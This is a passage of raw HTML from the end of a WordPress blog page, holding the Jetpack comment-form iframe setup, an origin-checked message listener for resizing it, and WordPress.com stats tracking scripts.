"http://jetpack.wordpress.com/jetpack-comment/?blogid=5837271&postid=1857&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en-US&jetpack_version=3.5.3&sig=8b4cc1c2197ecd1762ba094a7058217dbbf9c87d#parent=http%3A%2F%2Fblog.irreverence.co.uk%2F%3Fpage_id%3D1857"; } }; if ( window.postMessage ) { if ( document.addEventListener ) { window.addEventListener( 'message', function( event ) { if ( "http:\/\/jetpack.wordpress.com" !== event.origin ) { return; } jQuery( frame ).height( event.data ); } ); } else if ( document.attachEvent ) { window.attachEvent( 'message', function( event ) { if ( "http:\/\/jetpack.wordpress.com" !== event.origin ) { return; } jQuery( frame ).height( event.data ); } ); } } </script> <script type='text/javascript' src='http://stats.wp.com/e-201726.js' async defer></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:3.5.3',blog:'5837271',post:'1857',tz:'0',srv:'blog.irreverence.co.uk'} ]); _stq.push([ 'clickTrackerInit', '5837271', '1857' ]); </script> </body> </html>